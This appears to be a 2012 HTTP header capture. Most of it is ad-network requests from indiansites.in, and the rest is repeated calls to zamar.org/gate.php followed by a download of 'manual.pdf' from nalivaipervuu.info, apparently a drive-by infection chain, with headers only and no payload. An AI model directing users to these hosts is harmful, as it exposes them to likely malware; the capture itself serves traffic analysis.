GET /pagead/ads?client=ca-pub-8412828530142307&amp;output=html&amp;h=15&amp;slotname=2367292824&amp;w=468&amp;lmt=1352339075&amp;flash=10.0.45&amp;url=http%3A%2F%2Fwww.indiansites.in%2Fbeta%2F&amp;dt=1352339076454&amp;bpp=4&amp;shv=r20121031&amp;jsv=r20110914&amp;prev_slotnames=2367292824&amp;correlator=1352339076716&amp;frm=20&amp;adk=1391301316&amp;ga_vid=387901256.1352339077&amp;ga_sid=1352339077&amp;ga_hid=1874162876&amp;ga_fc=0&amp;u_tz=60&amp;u_his=1&amp;u_java=1&amp;u_h=885&amp;u_w=1176&amp;u_ah=855&amp;u_aw=1176&amp;u_cd=24&amp;u_nplug=8&amp;u_nmime=54&amp;dff=serif&amp;dfs=16&amp;adx=176&amp;ady=321&amp;biw=1159&amp;bih=778&amp;oid=3&amp;fu=0&amp;ifi=2&amp;dtd=743&amp;xpc=c60Sk3157Q&amp;p=http%3A//www.indiansites.in HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.indiansites.in/beta/
Cookie: id=223ae1776901005b||t=1350343758|et=730|cs=002213fd480aa30e9cef2f5d42
HTTP/1.1 403 Forbidden

Content-Type: text/html; charset=UTF-8
P3P: policyref=&quot;http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml&quot;, CP=&quot;CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR&quot;
X-Content-Type-Options: nosniff
Content-Encoding: gzip
Date: Thu, 08 Nov 2012 01:44:37 GMT
Server: cafe
Cache-Control: private
Content-Length: 82
X-XSS-Protection: 1; mode=block
GET /gampad/ads?correlator=3822782316923799&output=json_html&callback=GA_googleSetAdContentsBySlotForSync&impl=s&client=ca-pub-8412828530142307&slotname=homepage_right&page_slots=homepage_right&cookie_enabled=1&url=http%3A%2F%2Fwww.indiansites.in%2Fbeta%2F&lmt=1352339075&dt=1352339077203&cc=16&biw=1159&bih=778&adk=2104700816&adx=869&ady=979&ifi=7&oid=3&u_tz=60&u_his=1&u_java=true&u_h=885&u_w=1176&u_ah=855&u_aw=1176&u_cd=24&u_nplug=8&u_nmime=54&flash=10.0.45&gads=v2&ga_vid=387901256.1352339077&ga_sid=1352339077&ga_hid=1874162876 HTTP/1.1

Host: pubads.g.doubleclick.net
GET /gampad/ads?correlator=3822782316923799&amp;output=json_html&amp;callback=GA_googleSetAdContentsBySlotForSync&amp;impl=s&amp;client=ca-pub-8412828530142307&amp;slotname=homepage_right&amp;page_slots=homepage_right&amp;cookie_enabled=1&amp;url=http%3A%2F%2Fwww.indiansites.in%2Fbeta%2F&amp;lmt=1352339075&amp;dt=1352339077203&amp;cc=16&amp;biw=1159&amp;bih=778&amp;adk=2104700816&amp;adx=869&amp;ady=979&amp;ifi=7&amp;oid=3&amp;u_tz=60&amp;u_his=1&amp;u_java=true&amp;u_h=885&amp;u_w=1176&amp;u_ah=855&amp;u_aw=1176&amp;u_cd=24&amp;u_nplug=8&amp;u_nmime=54&amp;flash=10.0.45&amp;gads=v2&amp;ga_vid=387901256.1352339077&amp;ga_sid=1352339077&amp;ga_hid=1874162876 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.indiansites.in/beta/
Cookie: id=223ae1776901005b||t=1350343758|et=730|cs=002213fd480aa30e9cef2f5d42
HTTP/1.1 200 OK

Content-Type: text/javascript; charset=UTF-8
P3P: policyref=&quot;http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml&quot;, CP=&quot;CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR&quot;
X-Content-Type-Options: nosniff
Content-Disposition: attachment
Content-Encoding: gzip
Date: Thu, 08 Nov 2012 01:44:37 GMT
Server: cafe
Cache-Control: private
Content-Length: 1359
X-XSS-Protection: 1; mode=block
GET /pagead/ads?client=ca-pub-8412828530142307&output=html&h=15&slotname=2367292824&w=468&lmt=1352339075&flash=10.0.45&url=http%3A%2F%2Fwww.indiansites.in%2Fbeta%2F&dt=1352339076476&bpp=4&shv=r20121031&jsv=r20110914&prev_slotnames=2367292824%2C2367292824&correlator=1352339076716&frm=20&adk=1391301316&ga_vid=387901256.1352339077&ga_sid=1352339077&ga_hid=1874162876&ga_fc=0&u_tz=60&u_his=1&u_java=1&u_h=885&u_w=1176&u_ah=855&u_aw=1176&u_cd=24&u_nplug=8&u_nmime=54&dff=serif&dfs=16&adx=176&ady=346&biw=1159&bih=778&oid=3&fu=0&ifi=3&dtd=798&xpc=uTgFQN3FNV&p=http%3A//www.indiansites.in HTTP/1.1

Host: googleads.g.doubleclick.net
GET /pagead/ads?client=ca-pub-8412828530142307&amp;output=html&amp;h=15&amp;slotname=2367292824&amp;w=468&amp;lmt=1352339075&amp;flash=10.0.45&amp;url=http%3A%2F%2Fwww.indiansites.in%2Fbeta%2F&amp;dt=1352339076476&amp;bpp=4&amp;shv=r20121031&amp;jsv=r20110914&amp;prev_slotnames=2367292824%2C2367292824&amp;correlator=1352339076716&amp;frm=20&amp;adk=1391301316&amp;ga_vid=387901256.1352339077&amp;ga_sid=1352339077&amp;ga_hid=1874162876&amp;ga_fc=0&amp;u_tz=60&amp;u_his=1&amp;u_java=1&amp;u_h=885&amp;u_w=1176&amp;u_ah=855&amp;u_aw=1176&amp;u_cd=24&amp;u_nplug=8&amp;u_nmime=54&amp;dff=serif&amp;dfs=16&amp;adx=176&amp;ady=346&amp;biw=1159&amp;bih=778&amp;oid=3&amp;fu=0&amp;ifi=3&amp;dtd=798&amp;xpc=uTgFQN3FNV&amp;p=http%3A//www.indiansites.in HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.indiansites.in/beta/
Cookie: id=223ae1776901005b||t=1350343758|et=730|cs=002213fd480aa30e9cef2f5d42
HTTP/1.1 403 Forbidden

Content-Type: text/html; charset=UTF-8
P3P: policyref=&quot;http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml&quot;, CP=&quot;CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR&quot;
X-Content-Type-Options: nosniff
Content-Encoding: gzip
Date: Thu, 08 Nov 2012 01:44:37 GMT
Server: cafe
Cache-Control: private
Content-Length: 82
X-XSS-Protection: 1; mode=block
GET /pagead/ads?client=ca-pub-8412828530142307&output=html&h=60&slotname=3914615204&w=468&lmt=1352339075&flash=10.0.45&url=http%3A%2F%2Fwww.indiansites.in%2Fbeta%2F&dt=1352339076724&bpp=3&shv=r20121031&jsv=r20110914&prev_slotnames=2367292824%2C2367292824%2C2367292824&correlator=1352339076716&frm=20&adk=3216236652&ga_vid=387901256.1352339077&ga_sid=1352339077&ga_hid=1874162876&ga_fc=0&u_tz=60&u_his=1&u_java=1&u_h=885&u_w=1176&u_ah=855&u_aw=1176&u_cd=24&u_nplug=8&u_nmime=54&dff=serif&dfs=16&adx=390&ady=500&biw=1159&bih=778&eid=39482000&oid=3&fu=0&ifi=4&dtd=630&xpc=U29PBLBGgm&p=http%3A//www.indiansites.in HTTP/1.1

Host: googleads.g.doubleclick.net
GET /pagead/ads?client=ca-pub-8412828530142307&amp;output=html&amp;h=60&amp;slotname=3914615204&amp;w=468&amp;lmt=1352339075&amp;flash=10.0.45&amp;url=http%3A%2F%2Fwww.indiansites.in%2Fbeta%2F&amp;dt=1352339076724&amp;bpp=3&amp;shv=r20121031&amp;jsv=r20110914&amp;prev_slotnames=2367292824%2C2367292824%2C2367292824&amp;correlator=1352339076716&amp;frm=20&amp;adk=3216236652&amp;ga_vid=387901256.1352339077&amp;ga_sid=1352339077&amp;ga_hid=1874162876&amp;ga_fc=0&amp;u_tz=60&amp;u_his=1&amp;u_java=1&amp;u_h=885&amp;u_w=1176&amp;u_ah=855&amp;u_aw=1176&amp;u_cd=24&amp;u_nplug=8&amp;u_nmime=54&amp;dff=serif&amp;dfs=16&amp;adx=390&amp;ady=500&amp;biw=1159&amp;bih=778&amp;eid=39482000&amp;oid=3&amp;fu=0&amp;ifi=4&amp;dtd=630&amp;xpc=U29PBLBGgm&amp;p=http%3A//www.indiansites.in HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.indiansites.in/beta/
Cookie: id=223ae1776901005b||t=1350343758|et=730|cs=002213fd480aa30e9cef2f5d42
HTTP/1.1 403 Forbidden

Content-Type: text/html; charset=UTF-8
P3P: policyref=&quot;http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml&quot;, CP=&quot;CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR&quot;
X-Content-Type-Options: nosniff
Content-Encoding: gzip
Date: Thu, 08 Nov 2012 01:44:37 GMT
Server: cafe
Cache-Control: private
Content-Length: 82
X-XSS-Protection: 1; mode=block
GET /pagead/ads?client=ca-pub-8412828530142307&output=html&h=60&slotname=2612022508&w=468&lmt=1352339075&flash=10.0.45&url=http%3A%2F%2Fwww.indiansites.in%2Fbeta%2F&dt=1352339076842&bpp=8&shv=r20121031&jsv=r20110914&prev_slotnames=2367292824%2C2367292824%2C2367292824%2C3914615204&correlator=1352339076716&frm=20&adk=1583532706&ga_vid=387901256.1352339077&ga_sid=1352339077&ga_hid=1874162876&ga_fc=0&u_tz=60&u_his=1&u_java=1&u_h=885&u_w=1176&u_ah=855&u_aw=1176&u_cd=24&u_nplug=8&u_nmime=54&dff=serif&dfs=16&adx=390&ady=1594&biw=1159&bih=778&oid=3&fu=0&ifi=5&dtd=766&xpc=Bsu5NYUYfg&p=http%3A//www.indiansites.in HTTP/1.1

Host: googleads.g.doubleclick.net
GET /pagead/ads?client=ca-pub-8412828530142307&amp;output=html&amp;h=60&amp;slotname=2612022508&amp;w=468&amp;lmt=1352339075&amp;flash=10.0.45&amp;url=http%3A%2F%2Fwww.indiansites.in%2Fbeta%2F&amp;dt=1352339076842&amp;bpp=8&amp;shv=r20121031&amp;jsv=r20110914&amp;prev_slotnames=2367292824%2C2367292824%2C2367292824%2C3914615204&amp;correlator=1352339076716&amp;frm=20&amp;adk=1583532706&amp;ga_vid=387901256.1352339077&amp;ga_sid=1352339077&amp;ga_hid=1874162876&amp;ga_fc=0&amp;u_tz=60&amp;u_his=1&amp;u_java=1&amp;u_h=885&amp;u_w=1176&amp;u_ah=855&amp;u_aw=1176&amp;u_cd=24&amp;u_nplug=8&amp;u_nmime=54&amp;dff=serif&amp;dfs=16&amp;adx=390&amp;ady=1594&amp;biw=1159&amp;bih=778&amp;oid=3&amp;fu=0&amp;ifi=5&amp;dtd=766&amp;xpc=Bsu5NYUYfg&amp;p=http%3A//www.indiansites.in HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.indiansites.in/beta/
Cookie: id=223ae1776901005b||t=1350343758|et=730|cs=002213fd480aa30e9cef2f5d42
HTTP/1.1 403 Forbidden

Content-Type: text/html; charset=UTF-8
P3P: policyref=&quot;http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml&quot;, CP=&quot;CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR&quot;
X-Content-Type-Options: nosniff
Content-Encoding: gzip
Date: Thu, 08 Nov 2012 01:44:37 GMT
Server: cafe
Cache-Control: private
Content-Length: 82
X-XSS-Protection: 1; mode=block
GET /pagead/ads?client=ca-pub-8412828530142307&output=html&h=600&slotname=2264561644&w=120&lmt=1352339075&flash=10.0.45&url=http%3A%2F%2Fwww.indiansites.in%2Fbeta%2F&dt=1352339076988&bpp=4&shv=r20121031&jsv=r20110914&prev_slotnames=2367292824%2C2367292824%2C2367292824%2C3914615204%2C2612022508&correlator=1352339076716&frm=20&adk=4201446564&ga_vid=387901256.1352339077&ga_sid=1352339077&ga_hid=1874162876&ga_fc=0&u_tz=60&u_his=1&u_java=1&u_h=885&u_w=1176&u_ah=855&u_aw=1176&u_cd=24&u_nplug=8&u_nmime=54&dff=serif&dfs=16&adx=869&ady=379&biw=1159&bih=778&oid=3&fu=0&ifi=6&dtd=716&xpc=hY0BPbgU0a&p=http%3A//www.indiansites.in HTTP/1.1

Host: googleads.g.doubleclick.net
GET /pagead/ads?client=ca-pub-8412828530142307&amp;output=html&amp;h=600&amp;slotname=2264561644&amp;w=120&amp;lmt=1352339075&amp;flash=10.0.45&amp;url=http%3A%2F%2Fwww.indiansites.in%2Fbeta%2F&amp;dt=1352339076988&amp;bpp=4&amp;shv=r20121031&amp;jsv=r20110914&amp;prev_slotnames=2367292824%2C2367292824%2C2367292824%2C3914615204%2C2612022508&amp;correlator=1352339076716&amp;frm=20&amp;adk=4201446564&amp;ga_vid=387901256.1352339077&amp;ga_sid=1352339077&amp;ga_hid=1874162876&amp;ga_fc=0&amp;u_tz=60&amp;u_his=1&amp;u_java=1&amp;u_h=885&amp;u_w=1176&amp;u_ah=855&amp;u_aw=1176&amp;u_cd=24&amp;u_nplug=8&amp;u_nmime=54&amp;dff=serif&amp;dfs=16&amp;adx=869&amp;ady=379&amp;biw=1159&amp;bih=778&amp;oid=3&amp;fu=0&amp;ifi=6&amp;dtd=716&amp;xpc=hY0BPbgU0a&amp;p=http%3A//www.indiansites.in HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.indiansites.in/beta/
Cookie: id=223ae1776901005b||t=1350343758|et=730|cs=002213fd480aa30e9cef2f5d42
HTTP/1.1 403 Forbidden

Content-Type: text/html; charset=UTF-8
P3P: policyref=&quot;http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml&quot;, CP=&quot;CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR&quot;
X-Content-Type-Options: nosniff
Content-Encoding: gzip
Date: Thu, 08 Nov 2012 01:44:37 GMT
Server: cafe
Cache-Control: private
Content-Length: 82
X-XSS-Protection: 1; mode=block
GET /gate.php HTTP/1.1

Host: zamar.org

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.indiansites.in/beta/
HTTP/1.1 200 OK

Content-Type: text/html
Date: Thu, 08 Nov 2012 01:44:36 GMT
Server: Apache/2
Vary: Accept-Encoding,User-Agent
Content-Encoding: gzip
Content-Length: 11129
Keep-Alive: timeout=1, max=100
Connection: Keep-Alive
GET /gate.php HTTP/1.1

Host: zamar.org

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.indiansites.in/beta/
HTTP/1.1 200 OK

Content-Type: text/html
Date: Thu, 08 Nov 2012 01:44:38 GMT
Server: Apache/2
Vary: Accept-Encoding,User-Agent
Content-Encoding: gzip
Content-Length: 501
Keep-Alive: timeout=1, max=99
Connection: Keep-Alive
GET /favicon.ico HTTP/1.1

Host: www.hiindians.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Cookie: fc=fcVal=1999045232951553088
HTTP/1.1 200 OK

Content-Type: text/html; charset=utf-8
Cache-Control: no-cache
Pragma: no-cache
Content-Encoding: gzip
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Thu, 08 Nov 2012 01:44:39 GMT
Content-Length: 136
Age: 0
Connection: keep-alive
GET /gate.php HTTP/1.1

Host: zamar.org

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.indiansites.in/beta/
HTTP/1.1 200 OK

Content-Type: text/html
Date: Thu, 08 Nov 2012 01:44:40 GMT
Server: Apache/2
Vary: Accept-Encoding,User-Agent
Content-Encoding: gzip
Content-Length: 501
Keep-Alive: timeout=1, max=100
Connection: Keep-Alive
GET /manual.pdf HTTP/1.1

Host: nalivaipervuu.info

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://zamar.org/gate.php
HTTP/1.1 200 OK

Content-Type: application/pdf
Server: nginx/1.2.4
Date: Thu, 08 Nov 2012 01:44:41 GMT
Content-Length: 156279
Connection: keep-alive
Last-Modified: Wed, 07 Nov 2012 18:49:35 GMT
Etag: &quot;509aad3f-26277&quot;
Accept-Ranges: bytes
GET /manual.pdf HTTP/1.1

Host: nalivaipervuu.info

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Range: bytes=16384-156278,16384-16385
HTTP/1.1 206 Partial Content

Content-Type: multipart/byteranges; boundary=00000000001
Server: nginx/1.2.4
Date: Thu, 08 Nov 2012 01:44:47 GMT
Content-Length: 140099
Connection: keep-alive
Last-Modified: Wed, 07 Nov 2012 18:49:35 GMT
Etag: &quot;509aad3f-26277&quot;
GET /gate.php HTTP/1.1

Host: zamar.org

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.indiansites.in/beta/
HTTP/1.1 200 OK

Content-Type: text/html
Date: Thu, 08 Nov 2012 01:44:48 GMT
Server: Apache/2
Vary: Accept-Encoding,User-Agent
Content-Encoding: gzip
Content-Length: 501
Keep-Alive: timeout=1, max=100
Connection: Keep-Alive
GET /gate.php HTTP/1.1

Host: zamar.org

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.indiansites.in/beta/
HTTP/1.1 200 OK

Content-Type: text/html
Date: Thu, 08 Nov 2012 01:44:50 GMT
Server: Apache/2
Vary: Accept-Encoding,User-Agent
Content-Encoding: gzip
Content-Length: 501
Keep-Alive: timeout=1, max=100
Connection: Keep-Alive
GET /gate.php HTTP/1.1

Host: zamar.org

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.indiansites.in/beta/
HTTP/1.1 200 OK

Content-Type: text/html
Date: Thu, 08 Nov 2012 01:44:55 GMT
Server: Apache/2
Vary: Accept-Encoding,User-Agent
Content-Encoding: gzip
Content-Length: 501
Keep-Alive: timeout=1, max=100
Connection: Keep-Alive
GET /gate.php HTTP/1.1

Host: zamar.org

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.indiansites.in/beta/
HTTP/1.1 200 OK

Content-Type: text/html
Date: Thu, 08 Nov 2012 01:44:56 GMT
Server: Apache/2
Vary: Accept-Encoding,User-Agent
Content-Encoding: gzip
Content-Length: 501
Keep-Alive: timeout=1, max=100
Connection: Keep-Alive
GET /gate.php HTTP/1.1

Host: zamar.org

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.indiansites.in/beta/
HTTP/1.1 200 OK

Content-Type: text/html
Date: Thu, 08 Nov 2012 01:44:57 GMT
Server: Apache/2
Vary: Accept-Encoding,User-Agent
Content-Encoding: gzip
Content-Length: 501
Keep-Alive: timeout=1, max=99
Connection: Keep-Alive
GET /gate.php HTTP/1.1

Host: zamar.org

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.indiansites.in/beta/
HTTP/1.1 200 OK

Content-Type: text/html
Date: Thu, 08 Nov 2012 01:44:58 GMT
Server: Apache/2
Vary: Accept-Encoding,User-Agent
Content-Encoding: gzip
Content-Length: 501
Keep-Alive: timeout=1, max=98
Connection: Keep-Alive
GET /gate.php HTTP/1.1

Host: zamar.org

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.indiansites.in/beta/
HTTP/1.1 200 OK

Content-Type: text/html
Date: Thu, 08 Nov 2012 01:44:59 GMT
Server: Apache/2
Vary: Accept-Encoding,User-Agent
Content-Encoding: gzip
Content-Length: 501
Keep-Alive: timeout=1, max=97
Connection: Keep-Alive
GET /gate.php HTTP/1.1

Host: zamar.org

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.indiansites.in/beta/
HTTP/1.1 200 OK

Content-Type: text/html
Date: Thu, 08 Nov 2012 01:45:00 GMT
Server: Apache/2
Vary: Accept-Encoding,User-Agent
Content-Encoding: gzip
Content-Length: 501
Keep-Alive: timeout=1, max=96
Connection: Keep-Alive